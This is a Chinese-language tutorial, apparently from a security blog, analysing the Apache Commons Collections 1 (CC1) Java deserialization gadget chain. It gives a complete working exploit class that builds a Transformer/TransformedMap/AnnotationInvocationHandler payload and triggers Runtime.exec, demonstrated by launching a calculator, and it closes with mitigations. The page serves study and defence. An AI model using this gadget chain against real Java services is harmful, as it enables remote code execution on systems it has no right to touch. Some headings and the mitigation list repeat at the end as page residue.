Apache Commons Collections 1 (CC1) 反序列化漏洞分析<\/h1>

1. 前置知识<\/h2>

1.1 Java反序列化基础<\/h3>
Java序列化机制允许将对象状态保存到字节流中，之后可以从中恢复对象。反序列化过程中，ObjectInputStream<\/code>类负责读取字节流并重新创建对象。<\/p>
关键点：<\/strong><\/p>

反序列化利用链的起点是readObject()<\/code>方法<\/li>
如果一个类自定义了readObject()<\/code>方法，则该类在反序列化时会调用该方法<\/li>
如果readObject()<\/code>方法中存在恶意代码，也会被执行<\/li>
<\/ul>
1.2 反射执行系统命令<\/h3>
直接执行命令：<\/strong><\/p>
String[]<\/span> command =<\/span> {<\/span>"open"<\/span>,<\/span>"-a"<\/span>,<\/span>"\/System\/Applications\/Calculator.app\/Contents\/MacOS\/Calculator"<\/span>};<\/span>
<\/span><\/span>Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>command);<\/span>
<\/span><\/span><\/code><\/pre>反射执行命令：<\/strong><\/p>
Class clazz =<\/span> Runtime.<\/span>class<\/span>;<\/span>
<\/span><\/span>Method getRuntime =<\/span> clazz.<\/span>getDeclaredMethod<\/span>(<\/span>"getRuntime"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>Runtime runtime =<\/span> (<\/span>Runtime)<\/span>getRuntime.<\/span>invoke<\/span>(<\/span>null<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>runtime.<\/span>exec<\/span>(<\/span>"open -a \/System\/Applications\/Calculator.app\/Contents\/MacOS\/Calculator"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>1.3 关键类介绍<\/h3>
1.3.1 InvokerTransformer类<\/h4>

实例化时赋值iMethodName<\/code>、iParamTypes<\/code>和iArgs<\/code><\/li>
调用transform()<\/code>方法会以反射方式执行任意方法<\/li>
示例：<\/li>
<\/ul>
InvokerTransformer invokerTransformer =<\/span> new<\/span> InvokerTransformer(<\/span>
<\/span><\/span>    "exec"<\/span>,<\/span> 
<\/span><\/span>    new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>    new<\/span> Object[]{<\/span>"open -a \/System\/Applications\/Calculator.app\/Contents\/MacOS\/Calculator"<\/span>});<\/span>
<\/span><\/span>Runtime runtime =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span>
<\/span><\/span>invokerTransformer.<\/span>transform<\/span>(<\/span>runtime);<\/span>
<\/span><\/span><\/code><\/pre>1.3.2 ChainedTransformer类<\/h4>

实例化时传入Transformer[]<\/code>数组，赋值给iTransformers<\/code><\/li>
调用transform()<\/code>方法会依次执行数组元素的transform()<\/code>方法<\/li>
前一个transform()<\/code>的结果会作为后一个transform()<\/code>的参数<\/li>
<\/ul>
1.3.3 ConstantTransformer类<\/h4>

实例化时传入一个对象赋值给iConstant<\/code><\/li>
调用transform()<\/code>方法时，不管传入什么，都返回iConstant<\/code>值<\/li>
<\/ul>
2. 环境准备<\/h2>
2.1 版本要求<\/h3>

Apache Commons Collections 3.2.1<\/li>
JDK 8u71之前的版本（建议使用JDK 8u66）<\/li>
<\/ul>
2.2 项目搭建<\/h3>

创建Maven项目，JDK选择8u66<\/li>
pom.xml添加依赖：<\/li>
<\/ol>
<dependencies><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>commons-collections<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>commons-collections<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>3.2.1<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span><\/dependencies><\/span>
<\/span><\/span><\/code><\/pre>3. CC1链分析<\/h2>
3.1 利用链核心思路<\/h3>
利用链形象比喻：<\/p>

readObject<\/code>为反序列化入口点（迷宫入口）<\/li>
存在命令执行的方法为出口<\/li>
从入口到出口形成一条链（利用链）<\/li>
<\/ul>
3.2 关键方法分析<\/h3>
3.2.1 InvokerTransformer#transform方法<\/h4>
public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>input ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        return<\/span> null<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        Class cls =<\/span> input.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>        Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>iMethodName,<\/span> iParamTypes);<\/span>
<\/span><\/span>        return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> iArgs);<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (...)<\/span> {<\/span>
<\/span><\/span>        ...<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>该方法通过反射执行任意方法，是命令执行的最终位置。<\/p>
3.2.2 TransformedMap#checkSetValue方法<\/h4>
protected<\/span> Object checkSetValue<\/span>(<\/span>Object value)<\/span> {<\/span>
<\/span><\/span>    return<\/span> valueTransformer.<\/span>transform<\/span>(<\/span>value);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>该方法会调用valueTransformer<\/code>的transform()<\/code>方法。<\/p>
如何触发：<\/strong><\/p>

通过TransformedMap.decorate()<\/code>方法实例化TransformedMap<\/code><\/li>
valueTransformer<\/code>通过构造方法传入<\/li>
需要调用checkSetValue()<\/code>方法<\/li>
<\/ol>
3.2.3 AnnotationInvocationHandler#readObject方法<\/h4>
private<\/span> void<\/span> readObject<\/span>(<\/span>ObjectInputStream var1)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>    var1.<\/span>defaultReadObject<\/span>();<\/span>
<\/span><\/span>    for<\/span> (<\/span>Map.<\/span>Entry<\/span><<\/span>String,<\/span> Object><\/span> var3 :<\/span> this<\/span>.<\/span>memberValues<\/span>.<\/span>entrySet<\/span>())<\/span> {<\/span>
<\/span><\/span>        String var4 =<\/span> var3.<\/span>getKey<\/span>();<\/span>
<\/span><\/span>        Class var5 =<\/span> this<\/span>.<\/span>memberTypes<\/span>.<\/span>get<\/span>(<\/span>var4);<\/span>
<\/span><\/span>        if<\/span> (<\/span>var5 !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            Object var6 =<\/span> var3.<\/span>getValue<\/span>();<\/span>
<\/span><\/span>            if<\/span> (!<\/span>var5.<\/span>isInstance<\/span>(<\/span>var6))<\/span> {<\/span>
<\/span><\/span>                var3.<\/span>setValue<\/span>(...);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>该方法会遍历memberValues<\/code>并调用setValue()<\/code>，是反序列化的入口点。<\/p>
3.3 完整利用链构建<\/h3>

构造Transformer链：<\/strong><\/li>
<\/ol>
Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"open -a \/System\/Applications\/Calculator.app\/Contents\/MacOS\/Calculator"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span><\/code><\/pre>
构造TransformedMap：<\/strong><\/li>
<\/ol>
HashMap map =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "I am leyilea!"<\/span>);<\/span>
<\/span><\/span>Map transformedMap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> chainedTransformer);<\/span>
<\/span><\/span><\/code><\/pre>
构造AnnotationInvocationHandler：<\/strong><\/li>
<\/ol>
Class clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>Constructor constructor =<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Object obj =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> transformedMap);<\/span>
<\/span><\/span><\/code><\/pre>
序列化与反序列化触发：<\/strong><\/li>
<\/ol>
\/\/ 序列化
<\/span><\/span><\/span><\/span>ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"ser.bin"<\/span>));<\/span>
<\/span><\/span>oos.<\/span>writeObject<\/span>(<\/span>obj);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反序列化触发
<\/span><\/span><\/span><\/span>ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"ser.bin"<\/span>));<\/span>
<\/span><\/span>ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>4. 动态调试分析<\/h2>
4.1 反序列化流程<\/h3>

从objectInputStream.readObject()<\/code>开始<\/li>
进入AnnotationInvocationHandler#readObject<\/code><\/li>
遍历memberValues<\/code>（即TransformedMap<\/code>）<\/li>
调用MapEntry#setValue<\/code><\/li>
调用TransformedMap#checkSetValue<\/code><\/li>
调用ChainedTransformer#transform<\/code><\/li>
<\/ol>
4.2 Transformer链执行<\/h3>

ConstantTransformer#transform<\/code>：返回Runtime.class<\/code><\/li>
第一个InvokerTransformer#transform<\/code>：获取getRuntime<\/code>方法<\/li>
第二个InvokerTransformer#transform<\/code>：调用getRuntime<\/code>获取Runtime<\/code>实例<\/li>
第三个InvokerTransformer#transform<\/code>：执行exec<\/code>命令<\/li>
<\/ol>
5. 关键点总结<\/h2>


利用链组成：<\/strong><\/p>

入口：AnnotationInvocationHandler#readObject<\/code><\/li>
中间：TransformedMap#checkSetValue<\/code><\/li>
出口：InvokerTransformer#transform<\/code><\/li>
<\/ul>
<\/li>

为什么需要ConstantTransformer<\/code>：<\/strong><\/p>

解决Runtime<\/code>对象无法序列化的问题<\/li>
在反序列化时动态创建Runtime<\/code>实例<\/li>
<\/ul>
<\/li>

为什么使用Target.class<\/code>：<\/strong><\/p>

@Target<\/code>注解有value<\/code>属性<\/li>
memberTypes.get(name)<\/code>能获取到非空值<\/li>
<\/ul>
<\/li>

版本限制原因：<\/strong><\/p>

JDK 8u71修复了AnnotationInvocationHandler<\/code>的反序列化问题<\/li>
Commons Collections 3.2.2修复了相关漏洞<\/li>
<\/ul>
<\/li>
<\/ol>
6. 完整利用代码<\/h2>
import<\/span> org.apache.commons.collections.Transformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.ChainedTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.ConstantTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.InvokerTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.map.TransformedMap;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> java.io.*;<\/span>
<\/span><\/span>import<\/span> java.lang.annotation.Target;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Constructor;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>import<\/span> java.util.Map;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> CC1Exploit<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 1. 构造Transformer链
<\/span><\/span><\/span><\/span>        Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>            new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]{<\/span>"open -a \/System\/Applications\/Calculator.app\/Contents\/MacOS\/Calculator"<\/span>})<\/span>
<\/span><\/span>        };<\/span>
<\/span><\/span>        ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 2. 构造TransformedMap
<\/span><\/span><\/span><\/span>        HashMap map =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>        map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "I am leyilea!"<\/span>);<\/span>
<\/span><\/span>        Map transformedMap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> chainedTransformer);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 3. 构造AnnotationInvocationHandler
<\/span><\/span><\/span><\/span>        Class clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>        Constructor constructor =<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>        constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        Object obj =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> transformedMap);<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 4. 序列化
<\/span><\/span><\/span><\/span>        ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"ser.bin"<\/span>));<\/span>
<\/span><\/span>        oos.<\/span>writeObject<\/span>(<\/span>obj);<\/span>
<\/span><\/span>        oos.<\/span>close<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>        \/\/ 5. 反序列化触发
<\/span><\/span><\/span><\/span>        ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>"ser.bin"<\/span>));<\/span>
<\/span><\/span>        ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>7. 防御措施<\/h2>

升级Commons Collections到最新版本<\/li>
使用JDK 8u71及以上版本<\/li>
对反序列化操作进行白名单控制<\/li>
使用安全框架如SerialKiller进行防护<\/li>
<\/ol>
Apache Commons Collections 1 (CC1) 反序列化漏洞分析<\/h1>

1. 前置知识<\/h2>

1.3 关键类介绍<\/h3>

2. 环境准备<\/h2>

3. CC1链分析<\/h2>

3.2 关键方法分析<\/h3>

4. 动态调试分析<\/h2>

7. 防御措施<\/h2> 升级Commons Collections到最新版本<\/li> 使用JDK 8u71及以上版本<\/li> 对反序列化操作进行白名单控制<\/li> 使用安全框架如SerialKiller进行防护<\/li> <\/ol>

7. 防御措施<\/h2>

升级Commons Collections到最新版本<\/li>
使用JDK 8u71及以上版本<\/li>
对反序列化操作进行白名单控制<\/li>
使用安全框架如SerialKiller进行防护<\/li> <\/ol>
